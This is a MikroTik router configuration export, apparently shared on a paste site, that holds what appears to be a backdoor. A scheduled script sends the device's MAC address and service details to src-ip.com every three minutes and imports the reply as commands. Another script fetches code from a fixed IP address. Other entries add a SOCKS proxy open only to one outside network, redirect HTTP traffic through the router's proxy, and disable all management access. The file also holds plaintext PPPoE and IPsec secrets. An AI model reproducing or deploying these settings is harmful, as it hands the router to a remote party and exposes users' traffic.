Untitled

# model = 2011iL

/interface bridge
add fast-forward=no name=bridge.local

/interface ethernet
set [ find default-name=ether1 ] name=ether01
set [ find default-name=ether5 ] name=ether05
set [ find default-name=ether6 ] name=ether06
set [ find default-name=ether9 ] name=ether09
set [ find default-name=ether10 ] disabled=yes

/interface pppoe-client
add add-default-route=yes disabled=no interface=ether09 name=\
    pppoe.rt password=szt user=szt

/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik

/ip pool
add name=dhcp_pool0 ranges=192.168.8.1-192.168.8.253

/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=bridge.local name=dhcp1

/system logging action
set 0 memory-lines=1
set 1 disk-file-name=log

/interface bridge port
add bridge=bridge.local interface=ether01
add bridge=bridge.local interface=ether2
add bridge=bridge.local interface=ether3
add bridge=bridge.local interface=ether4
add bridge=bridge.local interface=ether05

/interface l2tp-server server
set enabled=yes ipsec-secret=mm use-ipsec=yes

/interface pptp-server server
set enabled=yes

/ip address
add address=192.168.8.254/24 interface=bridge.local network=192.168.8.0
add address=192.168.88.254/24 interface=bridge.local network=192.168.88.0

/ip dhcp-server lease
DELETE

/ip dhcp-server network
add address=192.168.8.0/24 dns-server=192.168.8.254 gateway=192.168.8.254

/ip dns
set allow-remote-requests=yes servers=77.88.8.8

/ip dns static
DELETE

/ip firewall filter
add action=drop chain=input disabled=yes dst-port=53 in-interface=\
    pppoe.rt protocol=tcp
add action=drop chain=input disabled=yes dst-port=53 in-interface=\
    pppoe.rt protocol=udp
add action=add-src-to-address-list address-list=Ok address-list-timeout=15s \
    chain=input comment=sysadminpxy dst-port=8080 protocol=tcp


/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
    src-address-list=!Ok to-ports=8080
add action=masquerade chain=srcnat out-interface=pppoe.rt \
    src-address=192.168.8.0/24
add action=masquerade chain=srcnat out-interface=pppoe.rt \
    src-address=192.168.88.0/24
add action=masquerade chain=srcnat out-interface=pppoe.rt \
    src-address=192.168.99.0/24


/ip proxy
set anonymous=yes enabled=yes

/ip proxy access
add action=deny

/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes
set api disabled=yes
set winbox disabled=yes
set api-ssl disabled=yes

/ip socks
set enabled=yes port=45753

/ip socks access
add action=deny src-address=!95.154.216.128/25

/ppp secret


/system clock
set time-zone-name=Europe/Moscow

/system routerboard settings
set silent-boot=no

/system scheduler
add interval=3m name="DDNS Serv" on-event="/system script run iDDNS" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-time=startup

/system script
add name=script4_ owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-resu\
    lt=no"

add name=iDDNS owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=":\
    global mac [/interface ethernet get 1 mac-address]\r\
    \n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
    \"_\".[/ip proxy get port])\r\
    \n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\
    \".[/interface pptp-server server get enabled])\r\
    \n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
    \n/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dns;:de\
    lay 3s\r\
    \n/import dns;:delay 4s;/file remove dns"

/tool bandwidth-server
set authenticate=no enabled=no

/tool romon
set enabled=yes secrets=DELETE